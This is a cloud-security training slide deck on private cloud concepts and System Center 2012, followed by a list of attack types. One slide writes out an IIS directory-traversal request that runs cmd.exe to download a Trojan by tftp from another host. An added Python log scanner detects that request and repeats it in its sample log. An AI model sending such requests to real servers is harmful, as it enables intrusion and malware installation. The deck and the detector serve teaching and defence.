Securing The Cloud

What is the Cloud? How do you lock it down?
Kevin King - Senior Technical Instructor ● Infrastructure/Cloud Consulting
| MCT CCSI MCSE-Private Cloud MCSA
MCSA-Server 2012 MCSE CCNA Data Center Cisco Quality Instructor 2014
New Horizons CLC| 6700 Jefferson, Building A | Albuquerque, NM 87109
p: 505.830.7100 |f: 505.830.2239 | kking@nhabq.com | www.nhabq.com
1. Introduction to the Private Cloud
2. Securing the Private Cloud
Overview
• Overview of the Cloud Computing Model
• Requirements for the Private Cloud
• Operating a Private Cloud Infrastructure with System Center
• Securing the Cloud
1) Overview of the Cloud Computing Model
• The Advent of Cloud Computing
• Public vs. Private Clouds
• Cloud Service Models
• Methods to Implement the Private Cloud
• System Center 2012 and the Private Cloud
The Advent of Cloud Computing
(Diagram: Client/Server Architecture to Cloud Computing)
Advantages of cloud computing include:
• Virtualized data center
• Reduced operational costs
• Server consolidation
• Improved resiliency and agility
Public vs. Private Clouds
Private cloud:
• Provides more control
• Is flexible
• Is customizable
• Has operational and management costs
Public cloud:
• Provides less control
• Provides less flexibility
• Provides less customization
• Reduced operational and management costs
Cloud Service Models
The three cloud service models are:
• Software as a Service (SaaS): includes business processes and applications
• Platform as a Service (PaaS): includes application execution services
• Infrastructure as a Service (IaaS): includes server, storage, and network infrastructure
Methods to Implement the Private Cloud
(Chart: the three implementation methods, Service Provider, Reference Architecture, and Custom, plotted on two axes: Level of Pre-integration (High/Low) and Deployment Time (High/Low))
System Center 2012 and the Private Cloud
System Center 2012 has the following components:
• App Controller
• Service Manager
• Virtual Machine Manager (VMM)
• Orchestrator
• Operations Manager
• Data Protection Manager (DPM)
• Configuration Manager
2) Requirements for the Private Cloud
• Key Business Requirements
• Service Identification and Onboarding
• Datacenter Administrators and Business Unit IT Administrators
Key Business Requirements
The key business requirements include:
• Competitive advantage
• Scalability
• Reduced cost
Service Identification and Onboarding
Service Identification:
• Does the application need to reside in the same location as the data?
• What computer resources are required?
• What are the software or operating system requirements?
• What network bandwidth will be required by the application between the users and the cloud?
Onboarding:
• Has the service passed the identity check and is it ready for the cloud?
• Have relevant backups taken place?
• Has the migration been tested successfully in a pre-production or UAT environment?
• Is there a documented method for fallback?
Datacenter Administrators and Business Unit IT Administrators
The datacenter administrator:
• Manages the physical infrastructure
• Manages the private cloud resources
• Configures access to cloud resources
The business unit IT administrator:
• Manages the business unit cloud
• Manages resources specific to the business unit cloud that they own
3) Operating a Private Cloud Infrastructure with System Center
• Provisioning the Private Cloud with Virtual Machine Manager
• Managing Public and Private Clouds with App Controller
• Service Management with Service Manager
• Automating Data Center Processes with Orchestrator
Provisioning the Private Cloud with Virtual Machine Manager
• A simple private cloud is created in Virtual Machine Manager by using the Create Cloud Wizard:
(Screenshot: Create Cloud Wizard)
Managing Public and Private Clouds with App Controller
Using the App Controller Portal, you can manage private clouds that were created with VMM and public clouds that were created on the Windows Azure platform.
Service Management with Service Manager
Service Manager delivers an integrated platform for automating and adapting IT service management best practices to your organization's requirements.
By using Service Manager, you can:
• Reduce mean time to resolution of issues through a self-service user experience
• Improve private cloud efficiency through centralized management of change processes
• Provide self-service provisioning of private cloud resources
• Implement compliance controls for the management of the private cloud infrastructure
Automating Data Center Processes with Orchestrator
Orchestrator provides a workflow management solution for the data center that allows you to automate the creation, monitoring, and deployment of resources in your environment.
By using Orchestrator, you can:
• Automate processes in your private cloud
• Improve operational efficiency
• Connect different systems from different vendors without the knowledge of scripting languages
4) Securing the Private Cloud
• Old days – security = planting two firewalls
• Today – security = very complex problem
Types of Attacks
Including, but not limited to:
• Packet sniffing— An application that uses the promiscuous mode of the network adapter to capture all network packets.
• IP spoofing— An attack in which a hacker assumes the IP address of another host to conceal their true identity.
• Denial-of-service (DoS) attack— Aims to overwhelm a service so as to deny legitimate requests from being serviced. The service may be in the form of bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and efforts should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following:
  • Code Red
  • Blaster
  • Ping of Death
  • Trinity
Types of Attacks (continued)
• Password attack— As its name implies, this attack intends to acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or they can be achieved via brute force.
• Man-in-the-middle attack— This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method.
• Application attack— This type of attack happens when application software holes are exploited to gain access to a computer system. The holes may be bugs or may be TCP port numbers that are exposed.
• Port redirection attack— This type of attack makes use of a compromised host to gain access to a network that is otherwise protected.
• Blue Pilling
Sequence of attacks
• After a phase of probing/scanning, the hacker detects the vulnerability of the web/application server
• The hacker exploits the vulnerability to get a shell
• For example:
  • Copy the Trojan on the web/application server:
• HTTPS://www.example.com/scripts/..%c0%af../winnt/syst
em32/cmd.exe?/c+tftp%20i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe
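Detection logic for the kind of request shown above, added here as an example and not part of the original slides: it decodes IIS W3C log entries the lenient way the vulnerable server did (so the overlong %c0%af form collapses to "/"), normalises the path, and flags requests that climb above the web root, request cmd.exe, or carry a tftp transfer in the query. The log lines are constructed for this example and only echo the slide's request pattern.

```python
from urllib.parse import unquote_to_bytes
# Constructed IIS-style (W3C) log lines for this example, not taken from the slides.
# Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2014-05-01 10:00:01 192.0.2.10 GET /default.htm - 200
2014-05-01 10:00:02 192.0.2.11 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp%20i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe 200
2014-05-01 10:00:03 192.0.2.12 GET /images/../default.htm - 200
"""

def decode_lenient(raw: str) -> str:
    """Percent-decode like a lenient server: an overlong two-byte UTF-8 form such as
    %c0%af, which strict decoders reject, collapses to the ASCII byte it encodes ('/')."""
    data, out, i = unquote_to_bytes(raw), [], 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))  # overlong -> ASCII
            i += 2
        else:
            out.append(chr(b))  # plain byte (a Latin-1 view is enough for path inspection)
            i += 1
    return "".join(out)

def escapes_webroot(path: str) -> bool:
    """True if '..' segments climb above the virtual root once '/' and '\\' are normalised."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
        elif seg not in ("", "."):
            depth += 1
        if depth < 0:
            return True
    return False

def scan_iis_log(text: str) -> list:
    """Return one finding per suspicious request: client IP, decoded path, reasons."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue  # skip header/comment lines and malformed entries
        client, stem, query = parts[2], decode_lenient(parts[4]), decode_lenient(parts[5])
        checks = ((escapes_webroot(stem), "path traversal above web root"),
                  ("cmd.exe" in stem.lower(), "command interpreter requested"),
                  ("tftp" in query.lower(), "tftp transfer in query"))
        reasons = [label for hit, label in checks if hit]
        if reasons:
            findings.append({"client": client, "stem": stem, "reasons": reasons})
    return findings
```

Calling scan_iis_log(SAMPLE_LOG) flags only the second entry; the third line's "/images/../default.htm" stays inside the root and is left alone, which is why normalising before matching matters more than grepping for "..".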
Server Farm Security Strategies
• Segmenting the Server Farm
• Building the Firewall Ruleset
• From Physical Separation to Logical Separation
Securing The Cloud
Surface Area
System Center 2012 has the following components:
• App Controller
• Service Manager
• Virtual Machine Manager (VMM)
• Orchestrator
• Operations Manager
• Data Protection Manager (DPM)
• Configuration Manager
Public vs. Private Clouds
Physical:
• Physical access to equipment
• OOB Management
• Password Policy
• Host Security
Logical:
• System Center Components
• Individual VMs
• Services and Apps
• Passwords/Encryption/Least Privilege